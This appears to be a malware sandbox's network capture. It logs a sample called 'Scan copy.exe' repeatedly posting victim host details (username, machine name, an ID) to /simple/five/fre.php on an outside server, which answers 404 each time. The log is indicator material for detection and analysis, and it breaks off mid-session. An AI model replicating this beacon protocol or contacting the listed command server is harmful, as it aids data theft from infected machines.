Nov 28, 2024 09:15:22.994276047 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49880	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:23.259109974 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:23.380780935 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:24.698816061 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49885	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:24.957735062 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:25.077799082 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:26.498522043 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:26 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.7	49889	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:26.779984951 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:26.899972916 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:28.370992899 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	49893	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:28.627492905 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:28.747512102 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:30.274113894 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	49898	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:30.535348892 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:30.655415058 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:32.167747974 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	49903	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:32.434931993 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:32.556716919 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:34.019035101 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	49909	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:34.287918091 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:34.408050060 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:35.875049114 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.7	49914	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:36.147876024 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:36.267971039 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:37.777539968 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.7	49918	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:38.036020994 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:38.156179905 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:39.432101011 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.7	49922	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:39.696580887 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:39.816582918 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:41.183394909 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.7	49928	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:41.477293968 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:41.597338915 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:42.916821957 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.7	49930	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:43.174424887 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:43.294625998 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:44.758248091 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	49935	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:45.020473957 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:45.140467882 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:46.605042934 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	49938	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:46.867748022 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:46.988970041 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:48.264616966 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	49943	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:48.543951988 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:48.663942099 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:50.179811001 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	49948	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:50.502160072 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:50.622383118 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:51.927736044 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	49952	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:52.208524942 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:52.328756094 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:53.836759090 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:53 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	49958	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:54.097814083 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:54.218254089 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:55.577980042 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	49962	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:55.864881039 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:55.988729954 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:57.305187941 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.7	49966	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:57.566478014 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:57.686634064 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:59.101942062 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.7	49971	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:59.366906881 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:59.487158060 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:16:00.808506012 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:16:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.7	49976	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
